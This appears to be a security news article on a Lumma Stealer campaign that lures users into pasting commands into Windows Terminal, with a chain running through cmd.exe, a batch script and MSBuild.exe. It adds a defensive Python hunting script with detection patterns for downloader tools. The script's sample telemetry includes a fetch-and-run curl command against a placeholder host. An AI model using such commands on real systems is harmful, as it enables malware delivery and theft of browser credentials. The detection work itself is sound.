Microsoft has uncovered a second attack vector used by cybercriminals to deliver the Lumma Stealer malware. Recently, the Microsoft Threat Intelligence team identified a deeply concerning trend … against Windows Terminal, a terminal emulator widely used among sysadmins. The attack pathway was rolled out in February 2026. It walks users through a list of steps that trick them into running harmful commands, hiding those commands among contextually appropriate admin actions.
The second stage of the attack starts when users are asked to copy a zipped command and paste it into Windows Terminal. That command uses cmd.exe to download a batch script and save it in the user's “AppData\Local” folder. The batch script then writes a Visual Basic Script into the Temp directory (usually %TEMP%), which is subsequently executed via MSBuild.exe. Experts refer to this as LOLBin (living-off-the-land binary) abuse, in which legitimate binaries are misused for malicious purposes.
Details of the Attack Pathway
This attack pathway is particularly insidious: it preys on users' trust in legitimate tools built into the system. By leveraging Windows Terminal, attackers establish an environment that is indistinguishable from typical administrative workflows.
According to the Microsoft Threat Intelligence team, “This campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, guiding users into a privileged command execution environment that blends into legitimate administrative workflows and appears more trustworthy to users.”
Once the batch script runs, it retrieves a ZIP payload containing a legitimate but renamed 7-Zip binary. The binary is stored on disk under a randomized file name, further hiding the download's malicious intent.
Abusive Techniques and Their Implications
Running this batch script through MSBuild.exe is a clear instance of LOLBin abuse. In this step the malware connects to cryptocurrency blockchain RPC endpoints; examining the full connection reveals an EtherHiding technique (payload data hosted on a blockchain). Attackers are increasingly wielding blockchain technology to hide their infrastructure from authorities.
“The batch script is then executed via cmd.exe with the /launched command-line argument. The same batch script is then executed through MSBuild.exe, resulting in LOLBin abuse,” stated the Microsoft Threat Intelligence team. This multi-stage method enables attackers to obtain sensitive browser artifacts, ranging from Web Data to Login Data, and to exfiltrate them to their own infrastructure.
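The chain described above (a command pasted into Windows Terminal, cmd.exe downloading a batch script into AppData\Local, the script relaunched with /launched, and MSBuild.exe running a file from %TEMP% while talking to remote RPC endpoints) is exactly the kind of process lineage an EDR or SIEM rule can hunt for. The following Python is an added example written for this page, not Microsoft's detection logic and not code from the campaign: it runs a handful of lineage-and-command-line rules over constructed process-creation events. All paths, hosts, file names and the allowlist are assumptions chosen to mimic the article's description.

```python
"""Hunting rules for the Windows Terminal -> cmd.exe -> MSBuild.exe chain.

Added example; SAMPLE_EVENTS is constructed telemetry, not real data.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                       # full image path as an EDR would record it
    cmdline: str
    net_dest: Optional[str] = None   # "host:port" of an outbound connection, if any


# Windows Terminal appears as wt.exe (the launcher alias) or WindowsTerminal.exe
# (the hosting process) depending on which parent the sensor records.
TERMINAL_IMAGES = {"wt.exe", "windowsterminal.exe"}
DOWNLOADERS = re.compile(r"\b(curl|certutil|bitsadmin|invoke-webrequest|iwr|wget)\b", re.I)
LOCALAPPDATA = re.compile(r"(\\AppData\\Local\\|%LOCALAPPDATA%)", re.I)
TEMP_DIR = re.compile(r"(\\AppData\\Local\\Temp\\|%TEMP%|%TMP%)", re.I)
LAUNCHED_FLAG = re.compile(r'\.bat"?\s+/launched\b', re.I)
# Hosts MSBuild legitimately reaches in this (assumed) environment, e.g. package restore.
MSBUILD_ALLOWED_HOSTS = {"api.nuget.org"}


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image names from the process itself up through every known ancestor."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def hunt(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event matching one of the chain rules."""
    findings = []
    for e in events:
        name = basename(e.image)
        parents = ancestry(events, e.pid)[1:]          # exclude the process itself
        if name == "cmd.exe":
            # Rule 1: shell under Windows Terminal pulls a file into AppData\Local.
            if (TERMINAL_IMAGES & set(parents)) and DOWNLOADERS.search(e.cmdline) \
                    and LOCALAPPDATA.search(e.cmdline):
                findings.append(("terminal_download_to_localappdata", e.pid))
            # Rule 2: a batch file re-invoked with the /launched argument.
            if LAUNCHED_FLAG.search(e.cmdline):
                findings.append(("batch_relaunched_with_launched_flag", e.pid))
        elif name == "msbuild.exe":
            # Rule 3: MSBuild handed a file under %TEMP% from a cmd.exe lineage.
            if TEMP_DIR.search(e.cmdline) and "cmd.exe" in parents:
                findings.append(("msbuild_running_script_from_temp", e.pid))
            # Rule 4: MSBuild talking to a host outside the build allowlist.
            if e.net_dest and e.net_dest.split(":")[0].lower() not in MSBUILD_ALLOWED_HOSTS:
                findings.append(("msbuild_outbound_connection", e.pid))
    return findings


# Constructed sample telemetry: one malicious lineage plus two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\wt.exe", "wt.exe"),
    ProcEvent(101, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c curl -o "%LOCALAPPDATA%\r7x.bat" https://placeholder.invalid/a && "%LOCALAPPDATA%\r7x.bat"'),
    ProcEvent(102, 101, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\AppData\Local\r7x.bat" /launched'),
    ProcEvent(103, 102, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r'MSBuild.exe "C:\Users\alice\AppData\Local\Temp\k2.vbs"',
              net_dest="rpc-node.placeholder.invalid:443"),
    # Benign: Visual Studio building a project and restoring packages.
    ProcEvent(200, 1, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              "devenv.exe"),
    ProcEvent(201, 200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Restore", net_dest="api.nuget.org:443"),
    # Benign: an admin querying a service from the same terminal session.
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c sc query spooler"),
]

if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Run stand-alone, it reports four findings, all on the malicious lineage (pids 101, 102, 103) and none on the Visual Studio build or the admin's service query. The rules are intentionally independent so that a single hit (for instance MSBuild.exe with a network connection) can be triaged on its own, while several hits on one lineage are a strong signal. The MSBuild allowlist is the part that needs tuning per environment: package restores and internal feeds are normal MSBuild traffic, blockchain RPC endpoints are not.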
User Awareness and Prevention
Amid growing and persistent cyber threats, user awareness remains the best line of defense. More alarming still, this attack pathway relies on extremely common system tools, which underscores the need for users to stay alert when running commands and downloading files.
Read closely any instructions that prompt you to use system utilities such as Windows Terminal for purposes they were not designed for. The impact of this campaign is significant, and nonprofits need to be on the lookout to protect their valuable assets from data breaches.